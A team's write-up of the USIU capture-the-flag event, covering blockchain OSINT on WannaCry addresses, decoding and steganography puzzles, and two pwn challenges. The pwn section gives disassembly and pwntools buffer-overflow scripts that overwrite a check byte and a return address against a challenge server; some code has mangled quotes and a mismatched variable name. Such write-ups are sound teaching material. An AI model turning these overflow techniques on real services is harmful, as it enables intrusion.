USIU CTF
We were not lucky enough to be the first but we were content with what we managed.
https://usiu.ciphercode.dev/challenges Access the challenges via that link.
Blockchain
WannaCry one — Address
Some OSINT required for this one , Went to the browser and searched `Which address has transacted the most in WannaCry?` and got something really accurate , where as the flag was the address so the flag is therefore Aspire{12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw}
WannaCry two — Exit
Tasked with finding the address which was sent 9.03851401 BTC on the year 2017 on August. Using the blockchain link I found while looking for address, I then start going through the previous transactions , and I was able to get the address that received the BTC transacted , like DAMN all that money 🥲
FLAG : Aspire{16dfTuSx4f78eQ81PzTgBtBDyZ7QhNZ8Vy}
Ether one — Publisher
This was kinda easy , Given the address , we were to find the flag that was published at some point* but notice that it’s a smart contract deployed on ethereum rinkeby testnet, So first thing I do is visit Rinkeby TestNet Explorer, I searched the address a list of transactions done by the address given , I decide to check each of them and see the logs
I got neither me too , then I decide to check on the rest of the transactions, when I reach the 10th transaction it gave the flag
Ether two — Function
Given an address and we are told that it has a function that returns the flag , interesting ! I decide to search the address on the rinkeby testnet explorer and I got just a history of when the contract is created , so i decided to check on contracts and decompyled it to bytecode since the hint says there is a function which returns the flag
I now go back to the transaction hash and check the input data and convert it from hex to UTF-8 , and I got the flag :
Aspire{Solidity you gotta love it}
Cryptographic Basics
Decoder one — Hex
Easy pezy … there is a site i know of that does this kind of conversions pretty cool
( CyberChef )
Decoder two — ON/OFF
Using that same site we can easily covert this binary numbers to their ascii equivalent.
Decoder three — Feel
⠁⠎⠏⠊⠗⠑{⠛⠗⠕⠕⠧⠑⠎⠀⠁⠝⠙⠀⠗⠊⠙⠛⠑⠎}
This is braille .. .we use that same site to convert it to ascii equivalent.
Decoder six — md5
This challenge demanded a little thinking … We finally brute forced the values using hashcat.
Decoder four — Mod
Following the instructions on the challenge we can write a script for it.
#!/usr/bin/python3print(“Niwai flag tu …”)str = [381, 369, 388 ,376 ,405, 377, 387 ,405 ,396, 398 ,398 ,402 ,405, 371, 373, 400 ,395 ,370 ,395 ,369]
str2 = [‘A’, ‘B’, ‘C’, ‘D’, ‘E’, ‘F’, ‘G’, ‘H’, ‘I’, ‘J’, ‘K’, ‘L’, ‘M’, ’N’, ‘O’, ‘P’, ‘Q’, ‘R’, ‘S’, ‘T’, ‘U’, ‘V’, ‘W’, ‘X’, ‘Y’, ‘Z’, ‘0’, ‘1’, ‘2’, ‘3’, ‘4’, ‘5’, ‘6’, ‘7’, ‘8’, ‘9’, ‘_’ ]
flag = []for i in str:
j = i%41
y = str2[j]
flag.append(y)
print(“Aspire{“ + ‘’.join(flag) + ‘}’)
Decoder five — XOR
First i opted to find the key used in the first 7 bytes that i know. I used a script for this
from pwn import *text = bytes.fromhex(‘2416150c17001e23090c1545110d0045071c11001618’)
key = xor(text, ‘Aspire{‘)
print(“The key is:”,key)# use the key obtained (first part of the bytes output) to decrypt the encrypted flag
Getting the key i headed to this site XOR Calculator to calculate the flag.
So we get the part of the flag we didn’t have… Flag Aspire{bytes}
Steganography
1.Stego one — Cover your base
This was pretty simple. I found the flag in the metadata of the picture encoded using base64 encoding scheme.
2. Stego three — Face the music
Here you download the sound file then you decode it
(Morse Code Adaptive Audio Decoder)
Stego five — Right and Wrong
First u use binwalk to extract extra data
Use xxd command to view the hexadecimal of the files extracted where we find a date in every file .
So I wrote a bash script to get all those values from the 16 extracted file and this is what i got.
So using cyberchef i converted this to its ascii equivalent and boom i had the flag.
Stego four — Heading to success
Going direct to how i solved this challenge… lets check the hexadecimal data format of the file using xxd command . We see something juicy .
Look at that.. I know, its what we both thought… An image embedded on the image we have.. Lets make use of an online site i know that helps with this kind of stuff ( HexEd.it ).
So we should copy the hex values starting from USIU and make a new file .Give it a png file header that is replace the values of USIU with those of PNG files header .
Therefore we should change those first values to :
Perfect . Lets export the file now .
Now we have a Qr image to scan .. i used this site ( QR Code Scanner ) .
Reverse
Pwn one — Buffer
*************************************************************** FUNCTION ***************************************************************
undefined main()
undefined AL:1 <RETURN>
undefined1 Stack[-0x9]:1 local_9 XREF[2]: 00401162(W),
00401177(R)
undefined1 Stack[-0x78]:1 local_78 XREF[1]: 00401166(*)
main XREF[5]: Entry Point(*),
_start:00401088(*),
_start:00401088(*), 00402038,
004020d0(*)
00401156 f3 0f 1e fa ENDBR64
0040115a 55 PUSH RBP
0040115b 48 89 e5 MOV RBP,RSP
0040115e 48 83 ec 70 SUB RSP,0x70
00401162 c6 45 ff 00 MOV byte ptr [RBP + local_9],0x0
00401166 48 8d 45 90 LEA RAX=>local_78,[RBP + -0x70]
0040116a 48 89 c7 MOV RDI,RAX
0040116d b8 00 00 MOV EAX,0x0
00 00
00401172 e8 e9 fe CALL <EXTERNAL>::gets char * gets(char * __s)
ff ff
00401177 80 7d ff 4d CMP byte ptr [RBP + local_9],0x4d
0040117b 75 0a JNZ LAB_00401187
0040117d b8 00 00 MOV EAX,0x0
00 00
00401182 e8 07 00 CALL get_flag undefined get_flag()
00 00
LAB_00401187 XREF[1]: 0040117b(j)
00401187 b8 00 00 MOV EAX,0x0
00 00
0040118c c9 LEAVE
0040118d c3 RETIgnore most of the stuff and concentrate on the main ones . There is a gets function that is dangerous since it doesn’t limit the size of input . After that a variable offset [Rbp+local_9] earlier declared and initialized with 0x0 is compared to 0x4d . We know 0x4d is the hexadecimal representation of M .
Therefore, when the condition equates to false the program exits otherwise, function get_flag is called :)
Now that we have the logic, let’s solve it . So we have to overflow the variable with the character “M” . Taking into consideration the little endianess concept. Just by checking the assembly of the binary we can see the size of the buffer … I quickly wrote a script for this.
#!/usr/bin/python3
from pwn import *p = remote(“159.223.7.179”,”5000")
Payload = b”\x90"*111
Payload += p64(0x4d)
p.sendline(payload)
p.interactive()
And boom i got a shell .
Pwn two — Jump
This was easier using object dump.
objdump -d jump -M intelI saw a function get _flag() so all I had to do was take control of the instruction pointer by overwriting the return value of the function and jump to that function get_flag() .First things first lets get the offset . I like doing it manually then writing a script afterwards.
Getting offset was eazy pezy..Now let’s write a Script.
#!/usr/bin/python3
from pwn import *p = remote(“159.223.7.179”,”5001")
print(p.recv())
ret = p64(0x4011ab)
offset = 120
payload = b”\x90"*offset + ret
p.sendline(payload)p.interactive()
Now we got a shell
Thanks for your time :)
Contact us:
Check our hackmd.io blogs too :)
( trustie_rity )
( tahaafarooq )
Our twitter accounts are, Follow us :)
trustie_rity
nighthawk
muchiemma
Tahaafarooq
